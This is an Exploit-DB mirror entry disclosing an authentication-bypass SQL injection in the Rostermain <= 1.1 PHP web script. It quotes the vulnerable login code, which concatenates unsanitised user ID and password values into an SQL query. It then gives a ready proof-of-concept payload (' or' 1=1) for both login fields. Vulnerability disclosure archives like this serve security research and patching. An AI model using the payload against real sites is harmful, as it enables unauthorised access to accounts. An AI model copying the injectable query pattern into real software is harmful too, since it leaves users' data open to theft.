exploit-db-mirror/exploits/php/webapps/11356.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

20 lines
No EOL
489 B
Text

[+] Rostermain <= 1.1 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>
[+] Download : http://scripts.ringsworld.com/games-and-entertainment/rostermain/
[+] Vuln Code :
[index.php]
if ($_POST['userid'] && $_POST['password'])
{
// if the user has just tried to log in
$logquery = "select * from users "
."where username='$userid' "
." and passwd='$password' ";
[+] PoC :
username : ' or' 1=1
password : ' or' 1=1